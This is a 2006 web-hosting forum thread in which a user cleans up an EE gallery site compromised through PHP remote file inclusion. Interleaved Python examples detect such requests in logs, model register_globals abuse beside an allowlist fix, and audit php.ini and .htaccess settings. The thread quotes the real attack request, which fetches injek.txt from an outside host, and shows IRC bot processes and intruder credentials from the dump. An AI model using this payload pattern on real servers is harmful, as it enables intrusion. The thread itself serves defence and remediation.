Hacked Lunarpages account


yosemite
8th of June 2006 (Thu), 10:49
I too have been hacked and my account at Lunarpages is now suspended.

I have read all the posts on this. What is the best way to clean this up?

Try to repair or do a fresh install?


Lunarpages report:

yosem2 10282 0.0 0.0 2004 680 ? S Jun06 0:00 ./psybnc
yosem2 30938 0.0 0.0 2000 680 ? S Jun06 0:00 sendmail: accepting connections

?
chanary
yosem2 21801 0.0 0.0 4272 2668 ? S Jun06 0:12 ./egg -m Talstalob.txt
yosem2 22337 0.0 0.0 4152 2540 ? S Jun06 0:08 ./egg -m MazgaioB.txt


Operating environment info:


SERVER_SIGNATURE=<ADDRESS>Apache/1.3.34 Server at www.yosemitestock.com Port 80</ADDRESS>

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; {E035BCE7-84C3-32A2-94D9-F7B564FA4510})
SERVER_PORT=80
HTTP_HOST=www.yosemitestock.com
PHP_AUTH_USER=SetiawaN
DOCUMENT_ROOT=/home/yosem2/public_html
SCRIPT_FILENAME=/home/yosem2/public_html/ee/login.php
REQUEST_URI=/ee/login.php
SCRIPT_NAME=/ee/login.php
HTTP_CONNECTION=Keep-Alive
REMOTE_PORT=52434
PATH=/bin:/usr/bin
PWD=/home/yosem2/public_html/ee/.db
SERVER_ADMIN=webmaster@yosemitestock.com
REDIRECT_STATUS=200
PHP_AUTH_PW=030585
HTTP_ACCEPT_LANGUAGE=en-us
PATH_TRANSLATED=/home/yosem2/public_html/ee/login.php
HTTP_REFERER=http://www.yosemitestock.com/ee/login.php
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
REMOTE_ADDR=222.124.160.18
SHLVL=1
SERVER_NAME=www.yosemitestock.com
CONTENT_LENGTH=128
SERVER_SOFTWARE=Apache Web Server
SERVER_ADDR=216.227.218.113
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
CONTENT_TYPE=application/x-www-form-urlencoded
REQUEST_METHOD=POST
_=./psybnc


SERVER_SIGNATURE=<ADDRESS>Apache/1.3.34 Server at www.yosemitestock.com Port 80</ADDRESS>

HTTP_KEEP_ALIVE=300
HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
HTTP_HOST=www.yosemitestock.com
SERVER_PORT=80
DOCUMENT_ROOT=/home/yosem2/public_html
HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7
SCRIPT_FILENAME=/home/yosem2/public_html/ee/photo_comment.php
REQUEST_URI=/ee/photo_comment.php?solpotcrew=http://coffee-pot.info/injek.txt?
SCRIPT_NAME=/ee/photo_comment.php
HTTP_CONNECTION=keep-alive
REMOTE_PORT=61373
PATH=/bin:/usr/bin
_=./proc
SERVER_ADMIN=webmaster@yosemitestock.com
PWD=/home/yosem2/public_html/ee/.psy
REDIRECT_STATUS=200
HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
HTTP_REFERER=http://www.yosemitestock.com/ee/photo_comment.php?solpotcrew=http://coffee-pot.info/injek.txt?
PATH_TRANSLATED=/home/yosem2/public_html/ee/photo_comment.php
HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
REMOTE_ADDR=85.114.250.107
SERVER_NAME=www.yosemitestock.com
SHLVL=2
CONTENT_LENGTH=71
SERVER_SOFTWARE=Apache Web Server
QUERY_STRING=solpotcrew=http://coffee-pot.info/injek.txt?
SERVER_ADDR=216.227.218.113
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip,deflate
CONTENT_TYPE=application/x-www-form-urlencoded
HTTP_COOKIE=hotlog=1
REQUEST_METHOD=POST

files in system /tmp

4 drwxrwxrwx 2 yosem2 yosem2 4096 Jun 5 05:43 ...
4 drwxrwxrwx 2 yosem2 yosem2 4096 Jun 5 05:43 .
24 -rw-r--r-- 1 yosem2 yosem2 20847 Apr 8 01:30 perlbot.txt
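
The two environment dumps above are worth reading as detection signatures. The second one shows a query parameter whose value is itself a URL, which is the fingerprint of PHP remote file inclusion through allow_url_fopen, and the trailing "?" on injek.txt? is there so that whatever the vulnerable script appends to the parameter turns into a harmless query string on the attacker's host. The script below is an added example for this thread, not part of the Lunarpages report and not EE's code: it pulls such parameters out of Apache access-log lines and shows what URL PHP would actually fetch. The log lines are constructed (IPs, URIs and user agents are taken from the dump; timestamps, sizes and the benign third line are made up).

```python
"""Flag remote file inclusion (RFI) attempts in web-server request records.

Constructed example for this thread; not Lunarpages' or EE's code. The tell
is a query parameter whose *value* is itself a URL, as in the dump above:
    /ee/photo_comment.php?solpotcrew=http://coffee-pot.info/injek.txt?
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Schemes PHP's include()/require() will fetch when allow_url_fopen is On.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Apache common/combined log prefix: client identd user [time] "method uri proto" status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def rfi_params(request_uri):
    """Return [(name, value)] for query parameters whose value is a remote URL.

    parse_qsl undoes %-encoding, so an obfuscated 'h%74tp://' is caught too;
    the scheme comparison is case-insensitive for the same reason.
    """
    query = urlsplit(request_uri).query
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if value.lower().startswith(REMOTE_SCHEMES)
    ]


def swallowed_suffix(url_value, appended=".php"):
    """Show why attackers end the URL with '?'.

    A vulnerable script typically does include($page . ".php"); with the
    trailing '?' the appended ".php" becomes the query string of the
    attacker's URL, so their server still returns injek.txt unchanged.
    Returns (path, query) of the URL PHP would actually fetch.
    """
    fetched = urlsplit(url_value + appended)
    return fetched.path, fetched.query


def scan_access_log(lines):
    """One finding per RFI-looking parameter in Apache access-log lines."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for name, value in rfi_params(m.group("uri")):
            findings.append({
                "client": m.group("ip"),
                "time": m.group("time"),
                "param": name,
                "remote_host": urlsplit(value).hostname or "",  # host to block/report
                "status": int(m.group("status")),
            })
    return findings


# Constructed sample log: IPs, URIs and user agents come from the dump above;
# timestamps, byte counts and the benign third request are made up.
SAMPLE_LOG = [
    '85.114.250.107 - - [07/Jun/2006:03:12:44 -0700] "POST /ee/photo_comment.php?solpotcrew=http://coffee-pot.info/injek.txt? HTTP/1.1" 200 71 "http://www.yosemitestock.com/ee/photo_comment.php?solpotcrew=http://coffee-pot.info/injek.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"',
    '222.124.160.18 - - [07/Jun/2006:03:40:02 -0700] "POST /ee/login.php HTTP/1.1" 200 128 "http://www.yosemitestock.com/ee/login.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"',
    '10.0.0.5 - - [07/Jun/2006:09:00:00 -0700] "GET /ee/index.php?category=3&page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
    print(swallowed_suffix("http://coffee-pot.info/injek.txt?"))
```

Run it against the real access log with `scan_access_log(open("access_log"))`; the `remote_host` field is what you hand to the host's abuse desk, and the `client` field is what you block. The second sample line (the POST to login.php with HTTP basic auth) is not flagged because the URL alone carries no RFI marker; that request needs the file itself examined, which is why yosemite's renaming of the unexpected login.php was the right instinct.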

Pekka
8th of June 2006 (Thu), 12:14
Most secure solution: If you have backups of all (apps, photos, databases) from before the attack, ask Lunarpages to reinstall (wipe) the whole virtual server setup, and then restore your backups. Then change all your passwords and secret folder and file names.

Otherwise, you need to clean /tmp (and all other temp directories), run e.g. http://www.rootkit.nl/ and clean up manually. Change all your passwords and secret folder and file names.

yosemite
8th of June 2006 (Thu), 12:27
Thanks Pekka,

Is your reply for a server you run yourself or a virtual server?

I just have a hosted account. I went in and deleted all the hacked files and folders, renamed photo_comment as that was hacked, and there is now a login.php which I renamed.

They could not change the
register_globals = on
allow_url_fopen = on

so I put a php.ini file that turns those off in the root, as they suggested. I am now waiting to see if they will reactivate my account.

Do you think this will work?

Pekka
8th of June 2006 (Thu), 12:34
That sounds OK. If your virtual server is not a VPS or dedicated server, then file cleanup should do it. Still: change all FTP/shell passwords, change the input folder name, and request another MySQL password.

I think it is amazing that Lunarpages have register_globals = on for all servers by default. The whole admin community knows that that is about the worst setting you can make with php.ini these days.
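
Pekka's point about register_globals is the crux of this incident. With it on, a request like `?solpotcrew=http://coffee-pot.info/injek.txt?` creates a `$solpotcrew` variable before the script runs, and a script that builds an include path from a variable it never initialised will fetch the attacker's file whenever allow_url_fopen is also on. The Python below is an added example for this thread, not EE's code: the variable name and the URL are taken from the request in the dump, but that photo_comment.php followed exactly this include pattern is an assumption. It models the vulnerable behaviour next to the code-level fix, an allowlist of page names with the path built from constants, which holds regardless of what the host's php.ini says.

```python
"""How register_globals turns a URL parameter into an include path, and the
code-level fix.

Constructed example for this thread, not EE's or Lunarpages' code. The request
in the dump (photo_comment.php?solpotcrew=http://coffee-pot.info/injek.txt?)
is the signature of the classic pattern modelled below; that photo_comment.php
was written exactly this way is an assumption.
"""
import os
import posixpath
import re

DOCROOT = "/home/yosem2/public_html/ee"    # script directory from the dump above


def php_variables(request, script_assigns, register_globals=True):
    """Variable table a PHP script runs with for one request.

    register_globals=On pre-creates a variable per request parameter, so any
    variable the script reads before assigning it ($solpotcrew here) holds
    whatever the attacker put in the URL. Script assignments still win;
    only uninitialised reads are exploitable.
    """
    table = dict(request) if register_globals else {}
    table.update(script_assigns)
    return table


def vulnerable_target(variables, appended="/footer.php"):
    """Assumed vulnerable pattern: include($solpotcrew . "/footer.php") with
    $solpotcrew never assigned by the script. Returns what include() opens."""
    return variables.get("solpotcrew", "") + appended


def classify(target, allow_url_fopen=True):
    """What PHP's include() does with the computed target string."""
    if re.match(r"(https?|ftp)://", target, re.I):
        # allow_url_fopen=Off makes this fail with 'failed to open stream'
        return "remote" if allow_url_fopen else "blocked"
    # Relative targets resolve against the script's directory.
    resolved = posixpath.normpath(posixpath.join(DOCROOT, target))
    return "local" if resolved.startswith(DOCROOT + "/") else "traversal"


SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
PAGES = {"photo_comment", "index", "gallery"}   # assumed allowlist of includable pages


def hardened_target(request):
    """Fix that does not depend on php.ini: the request only selects a name
    from an allowlist, the path is built from constants, and the result is
    re-checked to sit under DOCROOT. In PHP this means reading $_GET['page']
    explicitly, never a bare $page, so register_globals no longer matters."""
    name = request.get("page")
    if name is None or not SAFE_NAME.match(name) or name not in PAGES:
        return None
    root = os.path.realpath(DOCROOT)
    target = os.path.realpath(os.path.join(root, name + ".php"))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


if __name__ == "__main__":
    attack = {"solpotcrew": "http://coffee-pot.info/injek.txt?"}
    target = vulnerable_target(php_variables(attack, {}))
    print(target, "->", classify(target))                          # remote
    print(target, "->", classify(target, allow_url_fopen=False))   # blocked
    print(hardened_target({"page": "photo_comment"}))              # .../ee/photo_comment.php
    print(hardened_target({"page": attack["solpotcrew"]}))         # None
```

Note what `classify` shows about the two settings: turning off allow_url_fopen stops the remote fetch but leaves the same script open to including attacker-chosen local paths (the "traversal" case), so the ini changes are containment, and the allowlist in the code is the actual fix.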

yosemite
8th of June 2006 (Thu), 12:43
What about photo_comment.php? Is it OK not to have this? And should there be a login.php in the root?

Again, thank you, and I will keep you posted.

cf

Pekka
8th of June 2006 (Thu), 12:49
No, there is no login.php in the EE root folder.
Get the files from http://photography-on-the.net/forum/showpost.php?p=1588164&postcount=3 and replace all of them. EE commerce templates might need editing (keep backups).

yosemite
8th of June 2006 (Thu), 15:36
I have done all the above suggestions and Lunarpages reactivated my account, but I now get the internal server error.

I see someone else had this problem at:
http://photography-on-the.net/forum/showthread.php?t=177875&page=2&highlight=internal+server+error

Does anyone know a fix?

MikeCaine
8th of June 2006 (Thu), 16:27
I just created a .htaccess file in /gallery with

php_flag register_globals off

as the sole contents and it plugged the hole for me.
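
MikeCaine's .htaccess line and yosemite's php.ini are two different mechanisms, and which one works depends on how the host runs PHP. `php_flag` in .htaccess is an Apache directive that only mod_php registers; on a host running PHP as a CGI binary (the dump above has GATEWAY_INTERFACE=CGI/1.1 and REDIRECT_STATUS, which php-cgi requires Apache to set), Apache rejects the unknown directive and answers 500 Internal Server Error for everything in that directory. php-cgi in turn reads a php.ini from the directory of the script it executes, so a php.ini in public_html does not on its own govern public_html/ee unless the host configures a shared location. The checker below is an added example for this thread, not anything from Lunarpages or EE; the `sapi` argument is something to confirm from the "Server API" line of a phpinfo() page rather than guess.

```python
"""Audit the per-directory PHP hardening available on a shared host, and
whether it will take effect.

Constructed example for this thread, not Lunarpages' or EE's code. Two
mechanisms exist and they are not interchangeable:
  * php.ini next to the scripts: read by PHP running as a CGI binary, from
    the directory of the script being executed.
  * php_flag / php_value lines in .htaccess: Apache directives registered by
    mod_php only. Without mod_php, Apache rejects them as unknown and serves
    500 Internal Server Error for that directory.
"""
import re

# The two settings this thread is about; both must be Off.
REQUIRED_OFF = ("register_globals", "allow_url_fopen")

# php.ini boolean spellings: 1/On/True/Yes are true, 0/Off/False/No/None/"" false.
_TRUE = {"1", "on", "true", "yes"}
_FALSE = {"0", "off", "false", "no", "none", ""}


def php_bool(raw):
    value = raw.strip().strip('"').lower()
    if value in _TRUE:
        return True
    if value in _FALSE:
        return False
    raise ValueError(f"not a php.ini boolean: {raw!r}")


def parse_php_ini(text):
    """{setting: raw value} from php.ini text; ';' starts a comment."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip()
    return settings


_PHP_DIRECTIVE = re.compile(r"^php_(?:flag|value)\s+(\S+)\s+(.+)$", re.I)


def parse_htaccess_php(text):
    """({setting: raw value}, [directive lines]) for php_* lines in .htaccess."""
    settings, lines = {}, []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = _PHP_DIRECTIVE.match(line)
        if m:
            settings[m.group(1).lower()] = m.group(2).strip()
            lines.append(line)
    return settings, lines


def audit(php_ini_text, htaccess_text, sapi):
    """sapi is 'cgi' or 'mod_php'. Returns a list of problems; [] means the
    directory is hardened for the settings in REQUIRED_OFF."""
    problems = []
    ini = parse_php_ini(php_ini_text)
    ht, ht_lines = parse_htaccess_php(htaccess_text)
    if sapi == "cgi":
        for line in ht_lines:
            problems.append(f".htaccess '{line}' needs mod_php; under CGI Apache returns 500")
        effective = ini
    else:
        effective = dict(ini)
        effective.update(ht)          # .htaccess overrides php.ini under mod_php
    for name in REQUIRED_OFF:
        if name not in effective:
            problems.append(f"{name} not set here: the server default applies")
        elif php_bool(effective[name]):
            problems.append(f"{name} is still On")
    return problems


# Constructed inputs: the weak values are the ones reported in this thread, the
# .htaccess line is MikeCaine's, the fixed php.ini is what yosemite describes.
WEAK_PHP_INI = "register_globals = on\nallow_url_fopen = on\n"
FIXED_PHP_INI = "; per-directory php.ini for public_html/ee\nregister_globals = Off\nallow_url_fopen = Off\n"
HTACCESS = "php_flag register_globals off\n"

if __name__ == "__main__":
    print(audit(WEAK_PHP_INI, "", "cgi"))         # both still On
    print(audit(FIXED_PHP_INI, "", "cgi"))        # []
    print(audit(FIXED_PHP_INI, HTACCESS, "cgi"))  # the 500 warning
    print(audit("", HTACCESS, "mod_php"))         # allow_url_fopen left at server default
```

The last case is the one that bites in practice: MikeCaine's single `php_flag` line closes register_globals but says nothing about allow_url_fopen, so on a mod_php host the server default for that setting still applies until a second line is added.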

yosemite
9th of June 2006 (Fri), 14:12
Well, I tried everything but could never get EE to work again; I always got the internal server error. Luckily they did a restore from backup for $75 and it seems to work.

Perhaps a broadcast email to all members of this forum about big security problems like this would save some people next time.

MikeCaine
9th of June 2006 (Fri), 15:55
> luckily they did a restore from backup for $75 and it seems to work.

Ouch - mine did it for free

> perhaps a broadcast email to all members of this forum about big security problems like this would save some people next time.

Yes, I'd happily sign up to a hack alert mailing list.

Pekka
9th of June 2006 (Fri), 16:00
For EE 2.0 I will start gathering EE news/alerts PM and email lists. Also, EE 2.0 will show on the admin index page the latest news and possible alerts and reminders (live from my server).